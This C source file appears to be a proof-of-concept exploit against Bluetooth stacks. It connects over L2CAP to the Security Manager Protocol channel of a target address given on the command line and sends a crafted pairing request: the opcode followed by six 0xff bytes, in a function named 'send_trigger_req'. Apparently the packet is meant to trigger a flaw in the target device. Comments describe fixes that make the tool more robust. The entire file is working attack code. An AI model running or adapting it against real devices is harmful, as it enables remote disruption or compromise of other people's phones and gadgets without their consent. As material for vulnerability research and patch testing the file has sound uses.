#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <errno.h>
#include <bluetooth/bluetooth.h>
#include <bluetooth/l2cap.h>
// #include "avdt_defs.h"
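/* L2CAP fixed channel identifier on which the Security Manager Protocol
 * (SMP) runs; used for both the local bind and the remote connect. */
#define BT_CID_SMP 0x0006
/* SMP command code (only SMP_OPCODE_PAIRING_REQ is used by this file) */
#define SMP_OPCODE_PAIRING_REQ 0x01
#define SMP_OPCODE_PAIRING_RSP 0x02
#define SMP_OPCODE_CONFIRM 0x03
#define SMP_OPCODE_RAND 0x04
#define SMP_OPCODE_PAIRING_FAILED 0x05
#define SMP_OPCODE_ENCRYPT_INFO 0x06
#define SMP_OPCODE_MASTER_ID 0x07
#define SMP_OPCODE_IDENTITY_INFO 0x08
#define SMP_OPCODE_ID_ADDR 0x09
#define SMP_OPCODE_SIGN_INFO 0x0A
#define SMP_OPCODE_SEC_REQ 0x0B
#define SMP_OPCODE_PAIR_PUBLIC_KEY 0x0C
#define SMP_OPCODE_PAIR_DHKEY_CHECK 0x0D
#define SMP_OPCODE_PAIR_KEYPR_NOTIF 0x0E
#define SMP_OPCODE_MAX SMP_OPCODE_PAIR_KEYPR_NOTIF
#define SMP_OPCODE_MIN SMP_OPCODE_PAIRING_REQ
#define SMP_OPCODE_PAIR_COMMITM 0x0F

/*
 * Little-endian stream writers: each appends the value to the byte stream
 * at p (least significant byte first) and advances p past it.
 *
 * Wrapped in do { ... } while (0) so that "MACRO(p, v);" is exactly one
 * statement. The previous bare "{ ... }" form expanded to "{ ... };",
 * which breaks an unbraced "if (c) MACRO(p, v); else ..." and silently
 * produces an empty statement after every use.
 */
#define UINT32_TO_STREAM(p, u32) \
    do { \
        *(p)++ = (uint8_t)(u32); \
        *(p)++ = (uint8_t)((u32) >> 8); \
        *(p)++ = (uint8_t)((u32) >> 16); \
        *(p)++ = (uint8_t)((u32) >> 24); \
    } while (0)
#define UINT24_TO_STREAM(p, u24) \
    do { \
        *(p)++ = (uint8_t)(u24); \
        *(p)++ = (uint8_t)((u24) >> 8); \
        *(p)++ = (uint8_t)((u24) >> 16); \
    } while (0)
#define UINT16_TO_STREAM(p, u16) \
    do { \
        *(p)++ = (uint8_t)(u16); \
        *(p)++ = (uint8_t)((u16) >> 8); \
    } while (0)
#define UINT8_TO_STREAM(p, u8) \
    do { \
        *(p)++ = (uint8_t)(u8); \
    } while (0)

/*
 * Build one SMP Pairing Request PDU and send it on sock_fd.
 *
 * The PDU is the opcode byte (SMP_OPCODE_PAIRING_REQ) followed by six
 * 0xff bytes, 7 bytes in total. Presumably the six bytes stand in for the
 * parameter fields of a Pairing Request -- confirm against the SMP
 * specification; the code itself only fixes their count and value.
 *
 * @param sock_fd  L2CAP socket already connected on BT_CID_SMP.
 *
 * A failed or short send() is reported on stderr instead of being dropped
 * (the original ignored the send() result entirely); the function still
 * returns void so existing callers are unaffected.
 */
void send_trigger_req(int sock_fd)
{
    uint8_t buffer[100] = {0};
    uint8_t *p = buffer;

    UINT8_TO_STREAM(p, SMP_OPCODE_PAIRING_REQ);
    memcpy(p, "\xff\xff\xff\xff\xff\xff", 6);
    p += 6;

    size_t len = (size_t)(p - buffer);
    ssize_t sent = send(sock_fd, buffer, len, 0);
    if (sent < 0) {
        perror("[*] send()");
    } else if ((size_t)sent != len) {
        fprintf(stderr, "[*] short send: %zd of %zu bytes\n", sent, len);
    }
}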
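/*
 * Entry point: opens an L2CAP socket on the SMP fixed channel (BT_CID_SMP),
 * connects it to the Bluetooth address given as argv[1] and sends a single
 * pairing request through it via send_trigger_req().
 *
 * Exit status is 0 only after the request has been sent, and -1 on a usage
 * error or when any socket step fails. The original fell through to
 * "return 0" after a failed bind()/setsockopt()/connect(), so a caller
 * could not tell that nothing had been sent.
 */
int main(int argc ,char* argv[]){
    int rc = -1;        /* set to 0 only once a request has gone out */
    int sock_fd = -1;   /* -1 means there is nothing to close at out: */
    int try_count = 1;  /* number of connect-and-send attempts */
    char dest[18];      /* "xx:xx:xx:xx:xx:xx" plus the terminating NUL */
    struct sockaddr_l2 local_l2_addr;
    struct sockaddr_l2 remote_l2_addr;
    struct bt_security btsec;

    if (argc < 2) {
        printf("usage : sudo ./poc TARGET_ADDR\n");
        return -1;
    }

    /* strncpy(dest, argv[1], 18) left dest unterminated whenever argv[1]
     * was 18 or more characters, and str2ba() then read past the buffer.
     * snprintf() always terminates; an address that does not fit is
     * rejected instead of being silently truncated. */
    int len = snprintf(dest, sizeof dest, "%s", argv[1]);
    if (len < 0 || (size_t)len >= sizeof dest) {
        fprintf(stderr, "[*] invalid address: %s\n", argv[1]);
        return -1;
    }

    while (try_count-- > 0) {
        sock_fd = socket(AF_BLUETOOTH, SOCK_SEQPACKET, BTPROTO_L2CAP);
        if (sock_fd == -1) {
            perror("[*] socket create failed : ");
            return -1;
        }

        /* Bind to any local adapter on the SMP fixed channel. */
        memset(&local_l2_addr, 0, sizeof local_l2_addr);
        local_l2_addr.l2_family = AF_BLUETOOTH;
        local_l2_addr.l2_cid = htobs(BT_CID_SMP);
        local_l2_addr.l2_bdaddr_type = 0;
        memcpy(&local_l2_addr.l2_bdaddr, BDADDR_ANY, sizeof(bdaddr_t));
        if (bind(sock_fd, (struct sockaddr *)&local_l2_addr, sizeof local_l2_addr) == -1) {
            perror("[*] bind()");
            goto out;
        }

        /* Request the lowest link security level for this socket. */
        memset(&btsec, 0, sizeof btsec);
        btsec.level = BT_SECURITY_LOW;
        if (setsockopt(sock_fd, SOL_BLUETOOTH, BT_SECURITY, &btsec, sizeof btsec) != 0) {
            perror("[*] setsockopt error");
            goto out;
        }
        // l2cap_set_mtu(sock_fd, 1024, 1024);

        memset(&remote_l2_addr, 0, sizeof remote_l2_addr);
        remote_l2_addr.l2_family = AF_BLUETOOTH;
        remote_l2_addr.l2_bdaddr_type = 0; //BDADDR_LE_PUBLIC;
        remote_l2_addr.l2_cid = htobs(BT_CID_SMP);
        //remote_l2_addr.l2_psm = htobs(6);
        /* The original ignored str2ba()'s result and connected to whatever
         * was left in l2_bdaddr; BlueZ returns -1 for a malformed address
         * (confirm for the libbluetooth version in use). */
        if (str2ba(dest, &remote_l2_addr.l2_bdaddr) < 0) {
            fprintf(stderr, "[*] invalid address: %s\n", dest);
            goto out;
        }
        printf("connect %s\n", dest);
        if (connect(sock_fd, (struct sockaddr *)&remote_l2_addr, sizeof remote_l2_addr) < 0) {
            perror("[*] can't connect");
            goto out;
        }

        send_trigger_req(sock_fd);
        //sleep(1);

        /* Close per attempt so a try_count above 1 does not leak a
         * descriptor per iteration. */
        close(sock_fd);
        sock_fd = -1;
        rc = 0;
    }

out:
    if (sock_fd >= 0) {
        close(sock_fd);
    }
    return rc;
}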